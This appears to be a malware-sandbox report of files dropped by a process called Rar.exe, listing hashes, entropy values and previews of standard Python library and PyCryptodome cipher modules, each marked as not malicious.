                                                                                                                                                                                                                                  SHA-256:09B0142B9E9BF996170D05834FCA7B466AC7B64F7F6DFCEB17CB581CD0E53F08
                                                                                                                                                                                                                                  SHA-512:0642B3DA6A7DC8E14EA0FD73AF72E23AB141A4554BB7267D69A456A19F45F7E0FFB70A6537C6720FFA970E2F07DD372D60BC595ECFCDB4C80A038C0EF2C55698
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utility functions for copying and archiving files and directory trees.....XXX The functions here don't copy the resource fork or other metadata on Mac....."""....import os..import sys..import stat..import fnmatch..import collections..import errno....try:.. import zlib.. del zlib.. _ZLIB_SUPPORTED = True..except ImportError:.. _ZLIB_SUPPORTED = False....try:.. import bz2.. del bz2.. _BZ2_SUPPORTED = True..except ImportError:.. _BZ2_SUPPORTED = False....try:.. import lzma.. del lzma.. _LZMA_SUPPORTED = True..except ImportError:.. _LZMA_SUPPORTED = False...._WINDOWS = os.name == 'nt'..posix = nt = None..if os.name == 'posix':.. import posix..elif _WINDOWS:.. import nt....COPY_BUFSIZE = 1024 * 1024 if _WINDOWS else 64 * 1024.._USE_CP_SENDFILE = hasattr(os, "sendfile") and sys.platform.startswith("linux").._HAS_FCOPYFILE = posix and hasattr(posix, "_fcopyfile") # macOS....# CMD defaults in Windows 10.._WIN_DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2530
                                                                                                                                                                                                                                  Entropy (8bit):4.711624840854989
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:SipTfd9QLvDh4vDgitan3vchcLysiasNuk0A942ZQR2qXZORotZuGqzCs:SiRfd9QLvt4vsit+0uustsJQRARoOj
                                                                                                                                                                                                                                  MD5:0DCA73844D3B73C9802F6210C70DD4DE
                                                                                                                                                                                                                                  SHA1:EABEABA84B410A8E97CA2D42B2AE48CA2B78D8EC
                                                                                                                                                                                                                                  SHA-256:D470D65C87914AE671A202B8987437A6918AAE477942E58BDB1D0056528115F7
                                                                                                                                                                                                                                  SHA-512:440149ABE836FFD5E4716F2474A6D0C6A0460F543A39BEC68E15651B5BC3E3294F7FC0D85C41C449224F234219809F710743E0002501D734A721B68377D39036
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import _signal..from _signal import *..from enum import IntEnum as _IntEnum...._globals = globals()...._IntEnum._convert_(.. 'Signals', __name__,.. lambda name:.. name.isupper().. and (name.startswith('SIG') and not name.startswith('SIG_')).. or name.startswith('CTRL_'))...._IntEnum._convert_(.. 'Handlers', __name__,.. lambda name: name in ('SIG_DFL', 'SIG_IGN'))....if 'pthread_sigmask' in _globals:.. _IntEnum._convert_(.. 'Sigmasks', __name__,.. lambda name: name in ('SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'))......def _int_to_enum(value, enum_klass):.. """Convert a numeric value to an IntEnum member... If it's not a known member, return the numeric value itself... """.. try:.. return enum_klass(value).. except ValueError:.. return value......def _enum_to_int(value):.. """Convert an IntEnum member to a numeric value... If it's not an IntEnum member return the value
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9152
                                                                                                                                                                                                                                  Entropy (8bit):4.914458127073994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dmQHvdBT4geSDztF9+hMkRI4H1Fit/zyc/Ki/yRAL:sedBTRt4Ot/L/K7AL
                                                                                                                                                                                                                                  MD5:8262A551167B54C56C60F05240A69080
                                                                                                                                                                                                                                  SHA1:05FF4ED6FAE8771AEE11D3E18D0AEB9B360764E7
                                                                                                                                                                                                                                  SHA-256:C9C16133388BA9C97A5A9541B671A767EC316FF32C74B7FA261BE4C2686B4119
                                                                                                                                                                                                                                  SHA-512:E82A1D9BFDA7EF6AFE84FE6DC126091B65ABA252C95B338599149064B3AE1F272DBA4F68A2DB593A61469396FC5D802A21B4C82EA48651720F47CEAF90453843
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/AES.py : AES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3775
                                                                                                                                                                                                                                  Entropy (8bit):4.806063133542859
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:5FYPjdtB5JjZL6mKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:5PZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                                                                                                                  MD5:B945169B742389524DF72625C079BB77
                                                                                                                                                                                                                                  SHA1:C9E77F8537E3B9888CBCF45E26774192ACB0C39A
                                                                                                                                                                                                                                  SHA-256:A0C8ED071D9E4B833FFD9BCA4658711806A4DA9D95492333EF39B61EF84FD1F6
                                                                                                                                                                                                                                  SHA-512:E1FAA4C936410781682007CE1C65C03D2CE947DCFB1A50D75184B075F5BEBC070A87FED4511086BBBF073EA831331BA8DFD3B87B520D5137AB80FB91D3AD4DA7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_ccm import CcmMode..from Crypto.Cipher._mode_eax import EaxMode..from Crypto.Cipher._mode_gcm import GcmMode..from Crypto.Cipher._mode_siv import SivMode..from Crypto.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Literal[1],.. use_aesni : bool = ...) ->
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7185
                                                                                                                                                                                                                                  Entropy (8bit):4.784592068528299
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dHQHv8gflA2jSkmRFmynD/t4AKdRYotKI:te8g9A82jnD/t4hjYotKI
                                                                                                                                                                                                                                  MD5:274E46A9AE6D3E092B48A7D1AB3F0D6D
                                                                                                                                                                                                                                  SHA1:FB5A62548FB3876FF73319D3C92565B64CEA3E69
                                                                                                                                                                                                                                  SHA-256:CF808C3951F83D9E86799E02A564661D6C372216656DC5D40FD9E19B21D84A53
                                                                                                                                                                                                                                  SHA-512:D9850D167368AE4B901512D5B3111EF6858E643FCD4DCA7EE2A263ADBB621D3D9729D124A9A9570EB250D63034734663B16770ACC5B2D4F1CEEFB3E47EACD8B3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC2.py : ARC2.py..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1020
                                                                                                                                                                                                                                  Entropy (8bit):4.950943296452636
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+PvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+Hx9GIJqJejbFoeRZ
                                                                                                                                                                                                                                  MD5:E00CF491B8FC5ACAF9CEF612321636A0
                                                                                                                                                                                                                                  SHA1:AB112C6E5D09F9A330047422454765FC4D691F1F
                                                                                                                                                                                                                                  SHA-256:605DD941F8ED380F3CF8906B995FCF9CFD8D801668E85B8FC889D72EC00087CD
                                                                                                                                                                                                                                  SHA-512:5FE5E3E20E1911E73FAB3886072A47F6C0E554C9F0D1A3604FDB8577747143C220457FB1105D565589E59A6202EE893F2F5C82A63267AEFA061BB129BA3A23C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5252
                                                                                                                                                                                                                                  Entropy (8bit):4.721675811667996
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:dHIB0jcQHMsvI/S3oCFG+PdiIPskHzgirvO/ZEgR2lYvHipJjHeLEyEMWnP7a7jv:doFQHvo7dIUoeGgR2uvi/jqEyExPNOuG
                                                                                                                                                                                                                                  MD5:0EF036A0343812F8BD2CD7CC80B2BA95
                                                                                                                                                                                                                                  SHA1:B443E26A222338477A44BF29FD5ACA2942271B86
                                                                                                                                                                                                                                  SHA-256:717B865CC7A4417AEAF0EFA70B60EF7C42CBFDAE4433BD704EAB9DDF75C50486
                                                                                                                                                                                                                                  SHA-512:AA5E7F0BF9C5199B5E76441DECB0CC5A0899EDBE7517F6A6646D14205E727FCF35EA935A921EC90502B7783D28CDCC5BF648F8FA2A06FFDEFE302171332C6D3F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC4.py : ARC4..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                                  Entropy (8bit):4.892911336139007
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                                                                                                                  MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                                                                                                                  SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                                                                                                                  SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
                                                                                                                                                                                                                                  SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6123
                                                                                                                                                                                                                                  Entropy (8bit):4.915681807073174
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:doFQHvofgiwZAEuVDYsgiiJsJWkGI9gmJt4qeA//RFWotKj:deQHvogySniiSYkGIOmJt4A/RYotKj
                                                                                                                                                                                                                                  MD5:C34B138E93044278085C0172B171945A
                                                                                                                                                                                                                                  SHA1:058CCA453B61AD12F6007A84E1626371EA2E5855
                                                                                                                                                                                                                                  SHA-256:9E71714F41AD4FC6499B83FF0199D1FF75D73D551A740CFFDC077D13AD930EDF
                                                                                                                                                                                                                                  SHA-512:39CA5D7161933F6AB86D14877E8E089D3BD11561494079B99C7B56209B074FAE50D31A8BA25760C3309E36BBB216A818ED49084E9479F0B47FEFC4F55BF2EC51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/Blowfish.py : Blowfish..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1056
                                                                                                                                                                                                                                  Entropy (8bit):4.93319559592513
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+7vEStrF+olDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+DtrF+wJqJejbFoev
                                                                                                                                                                                                                                  MD5:ADC4E67BDA4767C9F270DD32CCECC085
                                                                                                                                                                                                                                  SHA1:69FE8AABD602E03066EE627CFD0185486383A618
                                                                                                                                                                                                                                  SHA-256:C108D97BABEE0989438F29A01B0B0B95AE54118434A49AE832FD0EB2310FB73F
                                                                                                                                                                                                                                  SHA-512:C613BA321D3F8D0C41BE9DE652A47839C2059F9BF53F1FAA9E5967193D1898EAFF394857D6EAB4E0AA24E2159733BC304AACE3A94DBF6CD2B200EBA8712477D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgp
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6230
                                                                                                                                                                                                                                  Entropy (8bit):4.846211484152016
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:d2QHvVgdaKSnrF4xkOUBRkUtmz5t4AyRYotKw:UeVgd8n549aW75t4rYotKw
                                                                                                                                                                                                                                  MD5:1166B892369E19B4220BBC069D9CCABC
                                                                                                                                                                                                                                  SHA1:F8FFFEFAD392A8D7F79CD644B4D21D771D7458EF
                                                                                                                                                                                                                                  SHA-256:2E59E547BAF132E8553FC76E9AE2151B48C0610483E54130B0B6262A03F95903
                                                                                                                                                                                                                                  SHA-512:B99AA9B0F448B24BCF56DEB0BB30B948C1FBAE91692A78A291AE30A1935E4C74204A24925573E3E60777B5033CF748FD7C0D4BEE3E79BCF3D8D5FBBB19E195CE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/CAST.py : CAST..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1021
                                                                                                                                                                                                                                  Entropy (8bit):4.948780176242253
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+TivieL/tixsDOIosswDNqDNMN3zb1DoeZ:K+1+O+O+s+8+s+w+TQieL/tixsDOIYwr
                                                                                                                                                                                                                                  MD5:DF4E506EF652F92CD4F1C01C3E91C3E0
                                                                                                                                                                                                                                  SHA1:49625B957B302755062BFEF1FD00A1C88F378C79
                                                                                                                                                                                                                                  SHA-256:A017C351D0BF5AEFC610A60EE41B968BC5C1FA5E78B9FA593FE3C9C278CE9550
                                                                                                                                                                                                                                  SHA-512:9B85DFA5B47C60337AEE04D48AF64FE2B5F03152498DE4C340B0A4C170262D0C5BE8549787AA0093592E2308A41AE88A725E8C2D6B340E3B6EB8B2803C0328D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11023
                                                                                                                                                                                                                                  Entropy (8bit):4.6255670465451315
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IcwYkUlRGziNzvPppkzBjfgEcTUjwzgLMZKPOYbCCtrBUpt:0rskrs9VqxwwlCihP8xfgZF6PPOqBUt
                                                                                                                                                                                                                                  MD5:7BAFD5D12D4086033A33111C77432273
                                                                                                                                                                                                                                  SHA1:3EC235810D8A590B23B1477BD37D4C897B08D7BC
                                                                                                                                                                                                                                  SHA-256:3D8F607DAED2F2C1E419E044E996FD835FA8687CE25D30DDE13F63971937F0D3
                                                                                                                                                                                                                                  SHA-512:E8543F1504C5E6B6A4D17B073F769830545E9A2085892AD5236DB2EFE07B80127577E8FAB29D1EDABCA4533EAD9DA5378C01B18B5FBF6F9C99DDF83F5E6E0CB5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):798
                                                                                                                                                                                                                                  Entropy (8bit):4.852768717173627
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                                                                                                                  MD5:7311A085F06CFB4AF892363A4CB21E0E
                                                                                                                                                                                                                                  SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                                                                                                                  SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                                                                                                                  SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11897
                                                                                                                                                                                                                                  Entropy (8bit):4.951422413337409
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:0qrskrs9t3q/IIJOqi/JHxbkg9XRV8psd6agIojKVFtt:zrskrs9VqVi/j7XRViWkKVHt
                                                                                                                                                                                                                                  MD5:E433FA86720435190553A745AD2EB4F2
                                                                                                                                                                                                                                  SHA1:E3631F6CAFD1EEB7C94C4CD06E4879B764497735
                                                                                                                                                                                                                                  SHA-256:959D96E0C6F5A4D62BEBEA867CC9162CF0B32100F1A80ED1D98F7471D6480061
                                                                                                                                                                                                                                  SHA-512:5D5AB86FF50BC65FBB993B4AB81F93516F7D32F90B5DACA5ABD656997FB9BAC62C4BD57B0684248776CC4929B72CEBC984C80921B343AFFC55184C4DD0A7BB08
                                                                                                                                                                                                                                  Malicious:false
